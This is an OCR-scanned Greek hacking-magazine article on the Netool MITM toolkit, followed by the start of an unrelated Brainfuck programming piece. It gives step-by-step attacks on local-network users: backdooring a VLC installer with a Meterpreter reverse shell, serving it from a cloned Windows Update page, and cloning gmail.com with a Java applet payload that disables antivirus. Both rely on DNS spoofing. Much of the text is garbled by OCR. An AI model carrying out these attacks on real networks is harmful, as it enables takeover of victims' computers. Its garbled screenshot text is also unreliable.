Φυσικά, µε την εξέλιξη των μεθόδων κρυπτογράφησης και των διαφόρων πρωτο- 
κόλλων δικτύωσης, οι εν λόγω επιθέσεις γίνονται ὀλο και πιο δύσκολες. Δεν γίνονται 
όμως αδύνατες, οὐτε απίθανες. 


Όπως Ва 'χετε καταλάβει, Eva апо τα πράγματα που αγαπάμε ιδιαιτέρως (εκτὸς ano 
τη μελέτη της θεωρίας και τους πειραματισμούς) εἶναι η αυτοματοποίηση. Ακριβώς 
γι' αυτό, ὁταν συναντήσαμε το MiTM Pentesting Opensource TOOIkit (Netool) ενθου- 
σιαστήκαμε. Πρόκειται για µια ολόκληρη εργαλειοθήκη που περιλαμβάνει εργαλεία 
όπως ra Nmap, Ettercap, Sslstrip και Metasploit, ενώ αυτοματοποιεἰὶ πλήρως τις 
επιθέσεις ΜΙΤΜ στα топіка δίκτυα. Μη νομίζετε όμως OT! ro Netool δεν µπορεί να 
εξαπολύσει άλλου εἶδους επιθέσεις. О σχετικὸς κατάλογος εἶναι µακροσκελἠς κι EV- 
δεικτικἀ αξίζει va AVAMEPOUHE τις επιθέσεις DNS spoofing και Denial of Service στα 
ασύρματα δίκτυα. Κι επειδἠ ξέρουμε ότι EXETE NON ενθουσιαστεἰ, θα πούμε δυο λόγια 
για την εγκατἁστασή του και θα περιγράψουμε δύο πανίσχυρες επιθέσεις. 


Η εγκατάσταση 


To Netool µπορεί να εγκατασταθεἰ σε οποιοδήποτε σύστημα Linux, αλλά εµεἰς θα ou- 
νιστούσαμε τη διανομή Kali nou διαθέτει όλα τα απαραίτητα προγράµµατα προεγκα- 
τεστημένα. Στην περίπτωση nou επιλἐξετε κι εσεἰς ro Kali Linux, τα πράγματα εἶναι 
поло апла. Мпорєі να µην διατίθεται κἄποιο πακέτο εγκατάστασης ora repositories 
του Kali, αλλά η διαδικασία εἶναι πανεύκολη. Αρχικά, πρέπει να κατεβάσουµε то συ- 
μπιεσμένο πακέτο που περιλαμβάνει το проүрарра: http://bit.ly/getnetoolsh. Στη 
συνέχεια αποσυμπιέζουµε το πακέτο πληκτρολογώντας 


tar -xvf opensource[kali].tar.gz 
Όταν ολοκληρωθεἰ η αποσυµπἰἱεση, арке va εισἐλθουµε στον κατάλογο opensource 
nou θα ἐχει δημιουργηθεί, να καταστήσουµε εκτελἐσιμο TO script εγκατάστασης 
(INSTALL.sh) και να το τρέξουμε. 

cd opensource && chmod «x INSTALL.sh && ./INSTALL.sh 
Μετὰ ki an' auto, το Netool θα εἶναι ἐτοιμο προς χρήση. Πα την εκκἰνησἠ του np£- 
πει να μεταβούμε στον κατάλογο opensource και va εκτελέσουµε το script ονόματι 


netool.sh: 


./netool.sh 
Netool + Veil = Chaos! 
Στο προηγούμενο τεύχος rou deltaHacker αναφερθήκαµε σ' Eva ενδιαφέρον εργα- 


λείο µε то буора Backdoor Factory (BDF). Σ' auró το άρθρο θα αξιοποιήσουµε το 
συγκεκριµένο εργαλείο µέσω της πλατφόρμας Veil-Evasion, ενώ παράλληλα θα χρη- 
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σιμοποιήσουμε και το Netool. Σκοπὀς της επἰθεσής που θα παρουσιάσουμε εἶναι να 
φυτέψουμµμε στο σύστημα του θύματος Eva backdoor και συγκεκριµένα ro ωραιότατο 
Meterpreter shell. Το "παγιδευμένο" εκτελέἐσιµο θα προετοιμαστεί µε ro BDF και τη 
βοήθεια του Veil-Evasion. Όσο yia την парапорпд του θύματος σε κἄποιον δικὀ µας 
web server -yia τη λήψη rou πειραγμένου εκτελέἑσιµου- θα πραγµατοποιήσουµε µια 
επίθεση DNS spoofing µε ro Netool. Ας πάρουμε τα πράγματα pe TN σειρὰ. 


To Veil-Evasion υπάρχει ora repositories του Kali Linux, αλλά δεν εἶναι προεγκατε- 
στημένο στη διανομή. Н προσθήκη rou πραγματοποιείται εκτελώντας τα ακὀλουθα: 


root@kali: ^ 
File Edit View Search Terminal Help 
i~# git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensour 

ce 
Cloning into 'opensource'... 
remote: Counting objects: 126, done. 

e: Compressing objects: 100% (123/123), done. 
126 (delta 46), reused 0 (delta 0) 
jects: 100% (126/126), 20.25 MiB | 879 KiB/s, done. 
tas: 100% (46/46), done. 
cd opensource && chmod «x INSTALL.sh && ./INSTALL.sh 


Script to quickly 'install' the toolkit 


files, install dependencies, and start 


| 
in is rigth path, set permitions to all | 
| 
toolkit as root user (ubuntu distros) 


Н εγκατάσταση rou Netool εἶναι πολύ anAn και γρήγορη. Αρκεί η αντιγραφή rou git repository 
στον υπολογιστή µας και η εκτέλεση του αρχείου INSTALL.sh µε τα δικαιώµατα του root. 
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apt-get update 
apt-get install veil 
cd /usr/share/veil/setup 


./setup.sh 


Μετὰ την εγκατάσταση Tou Veil, εκκινούμε ro Netool κι eniA£youpe τη δεύτερη eni- 
λογἠ, που ανοίγει το μενού του εργαλείου Nmap. Στο παράθυρο που εμφανίζεται 
πρέπει να εισαγάγουµε την карта δικτύου που σκοπεύουµε να χρησιμοποιήσουμε. 
Στη δικἠ µας περίπτωση δώσαμε το wlanO. Αμέσως µετά εμφανίζονται οι υποστηρι- 
ζόμενες λειτουργίες. Ano εκεὶ πρέπει να επιλέξουμε την επιλογἠ που επιβάλλει την 
avdAuon/odpwon του τοπικού δικτύου. Όπως αντιλαμβάνεστε, auró που θέλουμε 
σ' αυτή τη φάση εἶναι να μάθουμε τη διεύθυνση IP του θύματος. Μετά ano λίγα 
δευτερόλεπτα, λοιπὸν, θα ανοίξει Eva παράθυρο µε Ta αποτελέσµατα της σάρωσης. 
Ανάμεσα στα μηχανήματα του τοπικού δικτύου θα βρούμε κι EKEIVO του θύματος. 
Αντιγράφουµε τη σχετικἠ διεύθυνση IP, κλείνουμε TO παράθυρο και επιλἐγουµε пал! 
τη χρήση του Nmap (επιλογἠ 2). Αυτή τη φορά, ὁμως, апо το παράθυρο µε τις δια- 
θἐσιµες λειτουργἱες επιλέγουμε την αναζήτηση ευπαθειών (επιλογἠ 8). 


Στο νέο παράθυρο που εμφανίζεται πληκτρολογούμε τη διεύθυνση IP του θύματος 
και πατάμε OK. Το πρόγραµµα θα µας ρωτήσει yia τις δικτυακὲς θύρες στις οποίες 
θέλουμε va επεκταθεἰ η αναζήτηση. Eksi арке! να δώσουμε την περιοχἠ 1-1000 και 
va πατήσουμε пал! то OK. Σε λίγα δευτερόλεπτα θα εμφανιστούν τα αποτελἑσµατα 
µε αρκετές ενδιαφἑρουσες πληροφορίες, ὁπως οι ανοικτὲς πόρτες και TO λειτουρ- 
γικὀ σύστημα. Πα την επίθεση που εξετάζουμε, η πληροφορία που χρειαζόμαστε 
εἶναι το λειτουργικὀ σύστημα και θα την αξιοποιήσουµε ката τη ρύθμιση του BDF. 
Στη δικἠ µας περίπτωση, πάντως, το μηχάνημα του θύματος ETpEXE τα Windows 7 
Professional. Εφόσον ο δικὀς µας στὀχος λοιπὸν ἐτρεχε Windows, για τη φιλοξενία 
TOU backdoor χρειαζὀμασταν Eva εκτελέσιμο τύπου EXE. Σκεπτόὀµενοι λίγο πονηρά, 
επιλέξαμε το αρχείο εγκατάστασης του προγράµµατος VLC και σπεύσαµε να το KATE- 
βάσουμε. Φυσικά, εσεἰς μπορείτε να κατεβάσετε οποιοδήποτε εκτελέἑσιµο πιστεύετε 
ότι θα εξαπατούσε ευκολότερα το στόχο σας. Εξάλλου, αν ο δικὸς σας στόχος τρέχει 
Linux ἡ OS X, εἶναι υποχρεωτικό να στραφεἰτε σε κἄποιο GAAO εκτελέσιμο. Όπως και 
να 'χει, όταν κατεβάσουμµε το EKTEAEOINO που θα μεταφέρει το backdoor, εκτελούμε 
το Veil-Evasion ano ἑνα τερματικὀ. 


veil-evasion 


Μόλις ξεκινήσει To πρὀγραμμα μπορούμε να πληκτρολογήσουμε την EVTOAN list και 
va πατήσουμε [Enter], yia να εμφανιστεί µια λίστα µε ra διαθέσιµα payloads. Για την 
επίθεση που εξετάζουμε прёп να στραφούμε στο υπ' αριθμὸν 14, nou αφθορἀ ото 
BDF. Αφού το επιλἐξουµε και φορτωθεί σαν το Васко payload, прёп να ασχολη- 
θούμε µε τη ρὐθμισὴ του. Στο πεδίο εντολὠν του Veil πληκτρολογούμε κατὰ ора 
τα ακόλουθα: 


set LHOST δική µας διεύθυνση IP 

set LPORT δικό µας port 

set orig exe /root/Desktop/vlc-2.1.5-win32.exe 
info 


generate 
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root@kali: ~/opensource 


File Edit View Search Terminal Tabs Help 


a 


| root@kali: ~/opensource 


installation found! 
installation found! 


instalation found! 


\ root@kali: ~/opensource 


MITM Pentesting OpenSource toolkit 


Distro:linux-kali 


Version:V4.4 


peterubuntulO[at]sourceforge[dot]net 


Choice description 

Show Local Connections 
Nmap scanner Menu 

Open router config 

. Ip tracer whois 
WebCrawler 

Retrieve metadata 
INURLBR.php 

rootsector exploits 


1» 
2. 
Sts 
4 

5i: 
6. 
ТАБ 
8. 


. Config ettercap 
. Launch MITM 
. show URLs visited 
. Sniff remote pics 
. Sniff SSL passwords 
. Dns-Spoofing 
. Share files in local lan 
. DoS attack [local] 
. Compile etter.filters 
кесиїе ettercap filter 
rdlist creator 


. Delete lock folders 
. Toolkit changelog 

. check for Updates 

. config toolkit 

. access database 

. Quit 


[+] ::(Your choice?) : 


[ required] 


[none] 

[Nmap] 

[browser] 

[browser] 

[firefox add-on] 

[wget] 

[inurlbr.php] 
[msf+apache+ettercap+priv8.sh] 


[ettercap] 
[ettercap] 
[ettercap] 
[ettercap+driftnet} 
[ettercap+sslstrip] 
[ettercap] 
[ettercap+apache] 
[ettercap] 
[ettercap] 
[ettercap] 

[common password profiler] 


[nautilus] 
[intro.nt] 
[wget+git] 
[toolkit_config] 
[toolkit database 


To βασικὀ μενού επιλογών rou Netool περιέχει µια πληθώρα εργα- 
λείων για την ανάλυση του δικτύου και τη διεξαγωγή επιθέσεων 
ΜΙΤΜ. Φυσικά, όλες αυτές oi Лєгтоирүієс̧ εἶναι αυτοματοποιημένες κι 
εμείς καλούμαστε va πραγµατοποιήσουµε λίγες και απλὲς ρυθμίσεις. 


Το τι πετυχαίνουμε µε τα παραπάνω εἶναι προφανὲς, av και ενδέχεται va αναρω- 
τιέστε για τις πρώτες δύο ρυθμίσεις. Βέβαια, Ooo! φίλοι θυμούνται την παρουσίαση 
του ΒΡΕ, θα καταλάβουν αμέσως περὶ τίνος πρὀκειται. Αν η επἰθεσή µας εξελιχθεἰ 
σύμφωνα µε TO σχέδιο, το backdoor θα ενεργοποιηθεἰ στο σύστημα του θύματος και 
θα θελἠσει va συνδεθεἰ στο δικὀ µας μηχάνημα για να δεχτεἰ τις EVTOAEG µας. Αυτή η 
σύνδεση θα επιτευχθεί µε τη βοήθεια ενὸς Metasploit listener, nou θα στήσουµε στο 
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δικὀ µας σύστημα και θα περιμένει "κλήση" апо To backdoor. Τα πεδία LHOST και 
LPORT, λοιπὀν, εἶναι η διεύθυνση IP του μηχανἡματὸς µας και η δικτυακἡή θύρα nou 
θα δώσουμε στις ρυθμίσεις του Metasploit listener. Αφού ξεκινήσει η διαδικασία £p- 
φύτευσης rou backdoor, το BDF θα σταματήσει σε κἄποια φάση και θα παρουσιάσει 
τα διαθέσιµα code caves. Πρόκειται για τις περιοχὲς του εκτελἐσιµου αρχείου στις 
οποίες μπορεὶ να τοποθετηθεὶ ο κὠδικας του backdoor. Σ' αυτή τη φάση εἶναι npo- 
τιµότερο να επιλέξουμε το μεγαλύτερο code cave. Σημειώστε бт! αν το εκτελέσιμο 
που προκύψει апо την εμφύτευση δεν εἶναι λειτουργικό, πρέπει να επαναλάβουµε 
τη διαδικασία επιλέγοντας κἀποιο ἆλλο code cave. Προς το τέλος της διαδικασίας 
θα µας ζητηθεἰ κι Eva ὀνομα για το TEAIKO εκτελἐσιµο. Λίγα δευτερόλεπτα μετά, TO 
φαρμακωμένο εκτελέσιμο θα εἶναι ἐτοιμο :D 


Μετὰ ano τα παραπάνω πρέπει να στήσουμε ἑναν web server, για τη φιλοξενία 
του μολυσμένου εκτελἑἐσιμου. Προς τούτο, επιστρἐφουµε στην αρχικἠ "σελίδα" του 
netool και επιλέγουμε το "rootsector exploits". Από το καινούριο μενού nou εμφα- 
vietai, επιλέγουμε το "Host a File attack". Μόλις ξεκινήσει το script, εμφανίζονται 
Ol τρεις ιστοσελίδες που μπορούν να κλωνοποιηθούν αυτόματα kai να σερβιριστούν 
ano τον δικό µας, τοπικὀ web server. Εμείς επιλέξαμε την πρώτη επιλογἠ, που κλω- 
νοποιεἰ την ιστοσελίδα του Windows Update. Σε αυτὸ το σημείο, οφείλουμε να pE- 
ταφέρουµε το εκτελέσιμο µε TO backdoor μέσα στον κατάλογο /home και να εισά- 
γουµε TO буора TOU στο νέο παράθυρο που εμφανίζεται. Μόλις πατήσουμε ΟΚ, το 
πρὀγραμμα θα µας ζητήσει να δώσουμε τις παραμέτρους LHOST και LPORT, ὁπως 
και τον τύπο του payload που χρησιμοποιήσαμε προηγουμένως. Όπως υποψιάζεστε, 
εκτὸς апо το στήσιμο του web server, το netool θα δημιουργήσει αυτόματα και то 
απαιτούμενο Metasploit listener. Па να ξεκινήσουν αυτές οι εργασίες, δίνουμε Eva 
τίτλο στην ιστοσελίδα που θα δημιουργηθεἰ και πατάμε OK. 


Οι παραπάνω εργασἰες θα ολοκληρωθούν αρκετά γρήγορα και το netool θα εμφα- 
νίσει µια OXETIKN EVOEIEN. Μόλις πατήσουµε [Enter], θα μεταφερθούμε στο αρχείο 
ρυθμίσεων etter.dns. Εκεἰ πρέπει να μεταβούμε στην περιοχή ónou εμφανίζεται το 
μήνυμα "Microsoft sucks" και να εισάγουµε τη διεύθυνση του μηχανήματος µας στις 
ακόλουθες παραμέτρους: 


.com А δική µας διεύθυνση IP 
*.com A δική µας διεύθυνση IP 
.com PTR δική µας διεύθυνση IP 


Μετὰ ki ano αυτό πατάμε [Ctrl--O] και [Ctrl--X], για την αποθήκευση και το κλεἰσι- 
но του αρχείου. Έτσι, εµφανίζεται το παράθυρο rou post exploitation module του 
Metasploit. Εκεἰ επιλέγουμε το default listener, πατάμε OK και εἰμαστε ἐτοιμοι. Н 
επἰθεσή µας ξεκίνησε. 


Αναρωτιέστε σε ποια επίθεση αναφερόμαστε; Οι ρυθμίσεις nou πραγµατοποιἠήσα- 
µε προς το τέλος της διαδικασίας (εντὸς του etter.dns), αφορούν σε µια επίθεση 
DNS spoofing που πραγματοποιείται αυτόματα апо το Netool (µε τη βοήθεια του 
Ettercap). Μήπως ropa avapWTIEOTE σε τι µας χρειάζεται αυτή η επίθεση; Ano τη 
στιγμὴ που ξεκινά, ὁταν κάποιος χρήστης του τοπικού δικτύου προσπαθεἰ va ouv- 
δεθεὶ σε κάποιο site µε top level domain το ".COM" θα καταλήγει να συνδεθεἰ στο 
δικὀ µας μηχάνημα. Exei θα βρίσκει τον δικὀ µας web server kai θα βλέπει την ιστο- 
σελἰδα του Windows Update, μαζὶ µε την προτροπή yia τη λήψη µιας ενημέρωσης. 


18 


File Edit View Search 


root@kali: -/opensource 


Payload 


Name 
LHOST 
LPORT 
orig exe 
payload 
tps 


Available commands: 
set 
info 


generate 


back 


enter 
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root@kali: ~/opensource 


Terminal Tabs Help 


root@kali: ~/opensource 


it handler 

loit handler 
the Backdoor Factory 
om | PE only meter ht 


E payloa 
go to the main menu 


ero 


command: M. 


File Edit View Search 


"Jopensource 


root@kali: */opensource 


Terminal Tabs Help 


у 


microsoft fake ι 


dobe reader 
lect ja 
- return to ге! 


::(chose option) :1 


f 1° Store file to be hosted in: /root 


2° input filename (ex. payload.bat) 


microsoft-update.exe 


Hello World 


Στην επίθεση "Host 
a File" χρησιµο- 
ποιούμµε το Veil- 
Evasion, µε σκοπὀ 
τη δημιουργία ενός 
εκτελέσιµου αρχείου 
που θα περιλαμβάνει 
backdoor. Στη συνέ- 
χεια δημιουργούμε 
µια κλωνοποιημένη 
σελίδα του Microsoft 
Update, την οποία 
φιλοξενεί το δικό µας 
μηχάνημα και ava- 
κατευθύνουμε όλη 
τη δικτυακἠ κίνηση 
προς τον τοπικό web 
server. Τα θύματα 
που 6a καταλήξουν 
εκεί, θα βρουν Eva 
κουμπί "Download" 
για τη λήψη µιας 
δήθεν σημαντικής 
ενημέρωσης. Όσοι 
κατεβάσουν και 
εκτελέσουν την ενη- 
µέρωση, θα παραδώ- 
gouv τον έλεγχο TOU 
unxavrjuaróc τους σε 
εμάς. 
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Н συγκεκριμένη ενηµέρωση εἶναι το εκτελἐσιµο αρχείο µε το backdoor! Av ο χρή- 
στης εἶναι ἄπειρος ἡ αφελἠς, το како δεν θα αργήσει va γίνει. Πα την ενεργοποίηση 
του backdoor, ἄλλωστε, δεν χρειάζεται να πραγµατοποιηθεἰ κάποιου εἶδους εγκατά- 
σταση του προγράµµατος, пара μόνο µια απλἠ εκτέλεση. Av κι ὁταν үү, o επιτιθὲ- 
μενος θα αποκτήσει Eva Meterpreter shell στο μηχάνημα του θύματος! 


Ὅπως βλέπετε, αν και η επίθεση nou περιγράψαµε ἦταν σύνθετη апо τεχνικἠς σκο- 
тас, η υλοποϊησή της ἦταν αρκετά εὐκολη. Το Netool απλοποίησε τη διαδικασία και 
αυτοματοποίησε πάρα πολλά βήματα. Ας δούµε тора pia ακόµα επίθεση. 


Κλωνοποίηση ιστοσελίδας και επίθεση Java Applet 


Н επίθεση που εξετἀάσαµε προηγουμένως στὀχευε κατὰ κύριο λὀγο τα συστήματα µε 
Windows. Па αυτά τα συστήματα, ἄλλωστε, εἶναι πολύ εὐκολο να βρούμε EKTEAE- 
стра που θα μεταφέρουν το backdoor, ενώ και οι χρήστες τους εἶναι πιθανότερο va 
εἶναι αρχάριοι και να εξαπατηθούν εὐκολα. Μη νομίζετε бт! υποτιμάμε όλους τους 
χρήστες των Windows, αλλά σκεφτείτε το ανάποδα: Ξέρετε πολλούς Ἑαρχάριους3” 
χρήστες nou να χρησιμοποιούν Linux; Σε αυτή την επίθεση, λοιπὀν, θα HETAMEPOU- 
µε το payload µε τη βοήθεια ενὸς Java applet. Φυσικά, θα στήσουμε και пал! ἑναν 
web server kai θα κλωνοποιήσουμε µια ιστοσελἰδα για την εξαπάτηση των θυμάτων. 
Επιπρόσθετα, θα χρησιμοποιήσουμε Eva post exploitation script για τον αυτόματο 
τερματισμό του anti-virus. 


Αφού ξεκινήσουμε το netool, επιλέγουμε το "rootsector exploits" και πληκτρολο- 
γούμε την карта δικτύωσης που θα χρησιμοποιήσουμε. Στο μενού που εμφανίζεται 
επιλέγουμε το "Clone Website". Μόλις πατήσουµε Enter για την ενεργοποίηση της 
επιλογἠς, θα χρειαστεί va εισάγουµε ορισμένα στοιχεία. Κατ' αρχάς, πρέπει να δώ- 
σουµε τη διεύθυνση του рпҳауйратос̧ µας (LHOST), καθὼς και τη σελίδα που 6ε- 
λουµε να κλωνοποιήσουμε. Εμεἰὶς δώσαμε ro gmail.com. Αμέσως μετά καλούμαστε 
να δώσουμε το λεγόμενο URIPATH και το APPLETNAME. Πρὀκειται για στοιχεία που 
χρησιμοποιούνται κατὰ την εξαπάτηση του θύματος και εμφανίζονται ως χαρακτη- 
ριστικἁ ενὸς δήθεν χρήσιμου Java applet. Σε αυτά τα δύο πεδία δώσαμε "support" 
και "microsoft" αντίστοιχα. Ακολούθως, прёп να δώσουμε τις διευθύνσεις ІР του 
θύματος και του router του τοπικού δικτύου. Αν σε αυτά τα πεδἰα δεν δώσετε kapia 
διεύθυνση, η επίθεση θα πραγµατοποιηθεἰ εναντίον όλων των χρηστῶν του τοπικού 
δικτύου. Λίγα δευτερόλεπτα αργότερα καλούμαστε να πατήσουμε [Enter], ὡστε va 
μεταφερθούμε στις ρυθμίσεις DNS rou Ettercap (αρχείο etter.dns). Όπως και στην 
προηγούμενη επίθεση, εντοπἰζουμε την περιοχή µε ro μήνυμα "Microsoft sucks" και 
εισάγουµε στις γραμμὲς που ακολουθούν τη δικἠ µας διεύθυνση IP. Με αυτόν τον 
τρόπο, όλες οι απὀπειρες σύνδεσης σε top level domain ".COM" θα καταλήγουν στο 
δικὀ µας μηχάνημα. Όπως αντιλαμβάνεστε, σε GUTO το στάδιο μπορούμε va φερ- 
θούμε λίγο nio πονηρὰ και να µην πραγµατοποιήσουµε µια τόσο γενικὴ ανακατεύ- 
θυνση. Па παράδειγµα, εμείς φροντἰσαμε yia την ανακατεύθυνση µὀνο rou gmail. 
com, εφόσον αυτὸ ακριβώς ro site εἶχαμε κλωνοποιήσει. Αφού πραγµατοποιήσουµε 
τις ρυθμίσεις µας εντὀς του αρχείου πατάμε [Ctrl--O] και [Ctrl--X], για αποθήκευση 
και ἐξοδο ano τον editor. Απομένουν δύο ακόµα ρυθμίσεις. Κατ' αρχάς, θα χρειαστεὶ 
να επιλέξουμε κάποιο payload. Па να στοχεύσουµε ὁλους τους χρήστες TOU τοπικού 
δικτύου και ανεξάρτητα апо το λειτουργικὀ σύστημα, πρέπει va προτιµήσουμε TO 
"Java payload". Τέλος, πρέπει να καθορίσουμε αν και ποιο post exploitation module 
θέλουμε να χρησιμοποιηθεί. Με апла λόγια, πρέπει va καθορίσουµε το av θα πραγ- 
µατοποιηθεἰ αυτόματα κἄποια ενέἑργεια στο μηχάνημα του θύματος και noia θα εἶναι. 
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Εδώ, αν θέλουμε την anevepyonoinon rou anti-virus, μπορούμε va πληκτρολογή- 
σουµετο "killav" και va πατήσουμµε [Enter]. Auto ἦταν ὁλο. Μέσα σε ελάχιστο χρόνο 
ша ακόµα πολύπλοκη επίθεση στήθηκε και εξαπολύθηκε. 


To dnsspoof θα μεταφέρει ὅσους προσπαθούν να επισκεφθούν το gmail.com στο 
δικὀ µας σύστημα και στην κλωνοποιημένη σελἰδα. Εκεἰ θα εµφανίζεται Eva unoriO£- 
μενο μήνυμα ασφάλειας, που θα Gnrà апо τον επισκέπτη να εκτελέσει µια διαδικασία 
σἀρωσης/επιδιόρθωσης. Όσοι εἶναι αφελεἰς ἡ αρχάριοι και πατήσουν στο κουμπί της 
ενεργοποίησης, θα µας προσφέρουν Eva ωραιότατο Meterpreter shell και το anti- 
virus θα απενεργοποιηθεί. Εμεἰς θα αποκτήσουμε πρὀσβαση στο σύστημά TOU, EVO 
αυτὸς θα προωθηθεἰ στο αληθινό Gmail και θα συνδεθεἰ κανονικά, αγνοώντας та 
όσα συνέβησαν πραγματικά. 


Μια υπερδύναμη στα χέρια µας 


Μέχρι στιγµἠς εξετάσαµε δυο αρκετά σοβαρές επιθέσεις. О δυνατότητες του netool, 
όμως, δεν περιορίζονται σε боса εἰδαμε. Όπως θα ἐχετε καταλάβει, το περισσότερο 
ενδιαφέρον συγκεντρώνεται στην επιλογή "rootsector exploits". Πίσω ano αυτήν 
κρύβεται Eva µεγάλο σύνολο επιθἐσεων, που αποσκοπούν στην απόκτηση πρὀσβα- 
σης στο μηχάνημα του στὀχου. Αρκεἰ να σας πούμε Ori θα βρεἰτε μέχρι και τη δυ- 
νατότητα δημιουργίας backdoor σε αρχεία АРК. Ta εν Aóyo αρχεία αποτελούν ката 
κάποιον τρόπο πακέτα εγκατάστασης yia το Android και θα σας προτρέπαµε να δο- 
κιμάσετε τη σχετικἠ επίθεση, αφού εἰναι σχετικἠ απλἠ και προσφέρει ενδιαφἐροντα 
αποτελἐσµματα. Πέρα ano τα "rootsector exploits", το Netool περιλαμβάνει µια σειρἆ 
εργαλείων ὁπως το Ettercap, που αξιοποιείται αυτόματα στις επιθέσεις ΜΙΤΜ. Στο 
οπλοστάσιὀ του συγκαταλέγονται κι εργαλεία ὁπως то driftnet, για την υποκλοπή 
των εικόνων που προβάλει το θύμα στον browser Tou, καθώς kai To sslstrip, nou £ni- 
τίθεται στον browser του θύματος και προσπαθεἰ να απενεργοποιἠσει την κρυπτο- 
γράφηση SSL. Με λίγα λόγια, το netool αποτελεἰ Eva υπερόπλο που αυτοματοποιεί, 
συνδυάζει και γενικἀ διευκολύνει τη χρήση πολλών ἄλλων εργαλείων. Οφεἰλουµε 
να εἷμαστε πάντοτε ενήμεροι yia τα προγράµµατα αυτού του εἰδους, Ох! μόνο γιατὶ 
αποτελούν εξαιρετικἀ εργαλεία για το pen-testing, αλλά και για £vav λόγο парапа- 
vw: Па να µην επαναπαυόμαστε ποτὲ και, pai µε τον εαυτὸ µας, να φροντίζουμε 
και για την ασφάλεια των γύρω µας. Παρεμπιπτόντως, µερικἀ άρθρα nou βοηθά- 
νε προς αυτή την κατεύθυνση βρἰσκονται στις διευθύνσεις http://deltahacker.gr/ 
arp-poisoning-alert και http://deltahacker.gr/hacking-me-to-android-part-1. Stay 
strong and stay safe ;) 
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Automated Exploits: Attack method 


Package.deb backdoor [Binary linux trojan] 
ing EXE Files [Backdooring EXE Files] 
[dns-spoof * backdoor.exe] 
meterpreter powershell ^ [dns spoof + mitm) 
3 file [dns-spoof + hosted file] 
ayle [dns-spoof + keylooger] 
[dns-spoof + java.j 
[dns-spoof + java-ar 
Input LHOST 
File Edit View Search Terminal Tabs Help 


example = = 
root@kali: ~/opensource root@kali; ~/opensource 


192.168.1.101| 


Cancel 


[Windows rdi s tras; Daytona, 
[Apple г 
Linux payload [Linux-distrós 
Java Signed Appl [Mutti-operat 
Android explo. [android me 
Webshel 
rate llcode 
ion hijacking 


t a listenner 


CLONE WEBSITE [ url OR domait 


Ἱ example: facebook.com 


gmail.com| 


Cancel 


Normal Payloads: 


File Edit View Search Terminal Tabs Help 


root@kali: -/opensource root@kali: -/opensource 


Input URIPATH 


еса 
support] 

Οι ρυθμίσεις για τις επιθέσεις που 
πραγματοποιεί το Netool εἶναι λίγες 
алла πρέπει να γίνονται µε προσοχή. 
Όχι γιατί υπάρχει κάποιος κίνδυνος 
για εμάς, αλλά γιατί ενδέχεται va 
περιορίσουµε τις πιθανότητες ENITU- 
χίας. Σημαντικὀ παράγοντα yia την 
επιτυχία αποτελεί και η κατάλληλη 
ρύθμιση rou etter.dns. 


Cancel 
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οσον 


DW oD nn3939§9§q§—|][:] 3} 


File Edit View Search Terminal Tabs Help 


root@kali: -/opensource root@kali: ~/opensource 


Input APPLETNAME 


example: microsoft 


microsofi 


-opensource 


Edit View Search Terminal Tabs Help 


root@kali: -/opensource 
autopwn + Iframe] 
+ index.html] 
Samsung 
RDP DoS 


WINRAR backdoo 
VBScript injection [microsoft 


Normal Payloa Attack method 


- Window 
(Linux -di: 


(Mul ti -op| 


AVAILABLE PAYLOADS. 
15]е[Х]е| [0111 | {ν]ΒΑΙ ΠΜ] ar] 
chose one payload from the drop-list bellow 
Option 
javalmeterpreter/reverse. tcp 
vindows/meterpreter/reverse. tcp 
linux/xB6/meterpreter/reverse. tcp 


osx/ppc/shellreverse. tcp 


Cancel 


to POLSON атт \дса\ Πθυνο ΓΚ] (anter tangs 


Payload [java apptet]-Firi nfig: 


CLONE 

APPLETNAME 

FILENAME В 1 

EXPLOIT : ser/java 
RAGE IN iA ex.html 


AFFECTED SYS 


Skill: Advanced 


Brainf*ck [μέρος 10] 


Εκτός ano τἐχνη, ο προγραμματισμός αποτελεί και npókAnon. Κι εμείς τις 
προκλήσεις ὀχι μόνο δεν τις προσπερνάµε, αλλά θα λέγαμε от! τις κυνηγάµε κιόλας. 
Κάπως ἐτσι, αποφασίσαμε να εγκαταλεΐψουµμε για λίγο τις συνηθισμένες γλὠσσες 
προγραμματισμού και να καταπιαστούμε µε µια γλῶσσα που μπορεί να avarivá£ei то 
μυαλὀ µας στον αέρα. Ναι, σωστά το γράψαμε -- και σωστά διαβάσατε. 


Brainfxck [µέρος 1ο] 
“4 


Γλώσσες προγραμματισμού υπάρχουν δεκάδες, yia каб γούστο και για κάθε σκοπὀ. 
Πέρα ano τις επιχειρηµατικὲς σκοπιμότητες, ο κύριος λόγος για την ανάπτυξη τόσων 
γλωσσών εἶναι η ποικιλία των προγραμματιστικὠν προβλημάτων και η προσπάθεια 
να διευκολυνθεί η δουλειά των προγραμματιστών. Κατὰ καιρούς έχουμε μελετήσει 
διάφορες γλὠσσες, ὁπως εἶναι η Python, η PHP, η C£ και φυσικά η C. Κάθε γλὠσσα 
έχει τη OIKN της λογική, που βρίσκεται περισσότερο ἡ λιγότερο κοντά στη λογική 
των υπολογιστών. Σε κάθε περίπτωση, όμως, λἰγο οι σελἰδες του περιοδικού, λίγο η 
αγάπη µας για τους υπολογιστὲς και η διάθεση για πειραματισμούς, έχουμε καταφέρει 
κάτι που για ορισμένους φαντάζει αδιανόητο: Να νιώθουμε άνετα όταν βλέπουμε 
κὠδικα και να εντοπἰζουµε κοινἀ στοιχεία σε ὀλες τις γλὠσσες προγραμματισμού. 
AUTO συμβαίνει µε σχεδὸν ὀλεςτις γλὠσσες που λύνουν κἄποιο πρόβλημα - ἡ, τέλος 
πάντων, xouv µια κάποια χρησιμότητα. Νομίζετε оті τώρα περιγράψαμε *OAEC* τις 
γλὠσσες; 


Brainfuck, yiari ἐτσι 


Ti συμβαίνει όταν o σκοπὀς µιας γλὠσσας δε σχετίζεται µε την επίλυση κἀποιου 
προβλήματος κι εστιάζει αποκλειστικἁὰ στην επίδειξη προγραμματιστικὠν 
δυνατοτήτων; Κάποιοι θα πουν ὁτι αυτὲς oi γλὠσσες εἶναι εντελώς άχρηστες και δεν 
αξίζει να σπαταλήσουν οὐτε λεπτὸ για την εκµάθησἡ τους. Εμεὶς апо τη μεριὰ µας 
θεωρούμε ὁτι εἶναι συναρπαστικὲς, κι όταν ξεκλἐέβουμε Ліүо χρόνο προσπαθούμε va 
τις μαθαίνουμε παϊζοντας. Mia τἐτοια γλὠσσα προγραμματισμού εἶναι και η Brain- 
fuck, που αποτελεἰ μάλιστα την πιο διάσημη апо τις λεγόμενες "εσωτερικὲς γλὠσσες" 
